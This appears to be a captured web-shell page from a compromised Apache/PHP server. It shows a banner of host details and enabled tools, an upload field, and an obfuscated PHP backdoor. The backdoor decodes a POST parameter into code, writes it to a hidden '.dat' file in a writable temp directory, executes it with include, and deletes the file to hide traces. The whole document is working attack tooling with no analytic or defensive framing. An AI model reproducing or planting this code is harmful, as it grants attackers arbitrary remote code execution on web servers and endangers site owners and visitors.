| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/Solum-construction/demo-job/vereion/ |
Upload File : |
<?php
if(@$_POST["\x72ef"] !== null){
$item = array_filter([getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/var/tmp", "/tmp"]);
$token = $_POST["\x72ef"];
$token = explode ('.' , $token ) ;
$ptr = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $s );
$p = 0;
$len = count( $token );
do {
if( $p >= $len) break;
$v8 = $token[$p];
$sChar = ord( $s[$p % $lenS] );
$d = ( ( int)$v8 - $sChar -( $p % 10)) ^ 87;
$ptr .= chr( $d );
$p++;
} while( true );
for ($pointer = 0, $object = count($item); $pointer < $object; $pointer++) {
$tkn = $item[$pointer];
if ((bool)is_dir($tkn) && (bool)is_writable($tkn)) {
$record = str_replace("{var_dir}", $tkn, "{var_dir}/.dat");
if (file_put_contents($record, $ptr)) {
include $record;
@unlink($record);
exit;
}
}
}
}